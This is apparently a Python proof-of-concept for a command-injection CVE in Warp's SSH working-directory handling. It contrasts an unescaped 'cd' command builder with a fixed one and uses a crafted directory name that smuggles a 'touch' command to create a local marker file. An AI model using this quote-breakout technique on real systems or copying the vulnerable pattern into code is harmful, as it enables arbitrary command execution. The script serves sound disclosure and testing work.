#!/usr/bin/env python3 """ CVE-2026-48732 Proof of Concept. This script safely reproduces the vulnerable shell command construction pattern from Warp's legacy SSH background command path. It runs only against the local shell and uses a marker file to demonstrate whether command injection occurred. """ from __future__ import annotations import argparse from pathlib import Path import shlex import subprocess import sys import tempfile DEFAULT_MARKER = "/tmp/warp_cve_2026_48732_confirmed" def shell_escape_single_quotes_for_posix(value: str) -> str: """Escape embedded single quotes for a surrounding POSIX single-quoted arg.""" return value.replace("'", "'\"'\"'") def build_vulnerable_command(current_directory_path: str, command: str) -> str: """ Reproduce the vulnerable command pattern: cd '{current_directory_path}' && Embedded single quotes are not escaped, so shell syntax can break out. """ return f"cd '{current_directory_path}' && {command}" def build_fixed_command(current_directory_path: str, command: str) -> str: escaped_path = shell_escape_single_quotes_for_posix(current_directory_path) return f"cd '{escaped_path}' && {command}" def remove_marker(marker: Path) -> None: try: marker.unlink() except FileNotFoundError: pass def run_shell(command: str) -> subprocess.CompletedProcess[str]: return subprocess.run( ["/bin/sh", "-c", command], check=False, text=True, capture_output=True, ) def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser( description="Local PoC for CVE-2026-48732 Warp SSH cwd command injection." ) parser.add_argument( "--mode", choices=("vulnerable", "fixed"), default="vulnerable", help="Run the vulnerable or fixed command builder.", ) parser.add_argument( "--marker", default=DEFAULT_MARKER, help=f"Marker file created by the payload. Default: {DEFAULT_MARKER}", ) parser.add_argument( "--keep-existing-marker", action="store_true", help="Do not remove an existing marker before running.", ) return parser.parse_args() def main() -> int: args = parse_args() marker = Path(args.marker) if not marker.is_absolute(): print("[-] Marker must be an absolute path.", file=sys.stderr) return 2 if not args.keep_existing_marker: remove_marker(marker) with tempfile.TemporaryDirectory(prefix="warp-cve-2026-48732-") as safe_dir: base_dir = Path(safe_dir) # The attacker-controlled cwd closes the single-quoted cd argument, # appends a harmless marker creation command, then reopens a quote. malicious_cwd = ( f"{base_dir}'; touch {shlex.quote(str(marker))}; echo '" ) if args.mode == "fixed": full_command = build_fixed_command(malicious_cwd, "pwd") else: full_command = build_vulnerable_command(malicious_cwd, "pwd") print(f"[*] Mode: {args.mode}") print("[*] Attacker-controlled remote cwd:") print(f" {malicious_cwd}") print("[*] Generated helper command:") print(f" {full_command}") print("[*] Executing generated command locally via /bin/sh...") result = run_shell(full_command) if result.stdout: print("[*] stdout:") print(result.stdout.rstrip()) if result.stderr: print("[*] stderr:") print(result.stderr.rstrip()) print(f"[*] Exit code: {result.returncode}") if marker.exists(): print(f"[!] SUCCESS: {marker} was created.") print("[!] Command injection behavior confirmed in the local simulation.") return 0 if args.mode == "fixed": print(f"[+] OK: {marker} was not created.") print("[+] Escaping prevented the injected shell syntax from executing.") return 0 print(f"[-] Failure: {marker} was not created.") return 1 if __name__ == "__main__": raise SystemExit(main())